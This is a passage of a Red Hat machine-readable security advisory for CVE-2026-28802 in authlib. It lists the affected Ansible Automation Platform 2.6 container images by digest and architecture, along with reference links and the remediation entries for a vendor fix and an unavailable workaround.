"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
